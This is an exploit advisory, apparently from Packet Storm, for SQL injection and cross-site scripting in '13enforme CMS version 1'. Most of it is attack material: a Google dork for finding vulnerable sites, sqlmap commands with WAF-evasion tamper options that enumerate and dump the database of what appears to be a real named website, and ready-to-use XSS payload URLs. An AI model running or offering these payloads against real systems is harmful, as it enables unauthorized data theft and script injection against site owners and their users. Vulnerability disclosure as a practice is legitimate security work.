13enforme CMS version 1 suffers from cross site scripting and remote SQL injection vulnerabilities.
a6a490b2f371a27e2f0821767995ce8bad44a708e68d124ff2e7e77ebfc083e7# Exploit Title: 13enforme CMS SQL Injection & XSS Vulnerability
# Google Dork:intext:"13enForme" +inurl:.php?id=
# Date: 2020-04-03
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.13enforme.com
# Version: 1
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
The attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp
Payload(s)
http://www.site.com/content.php?id=[]'[SQL INJECTION VULNERABILITY!]
SQLMAP Payload(s):
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D db538822134 --tables
sqlmap -u https://www.henokiens.com/content.php?id=99 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D db538822134 -T plv
PoC 2 :
XSS Vulnerability
Payload(s) :
"><img src=x onerror=prompt(document.domain);>
use payload:
https://www.example/content.php?id=5&lg=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E
www.anysite.com/file.php?id="><img src=x onerror=prompt(document.domain);>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed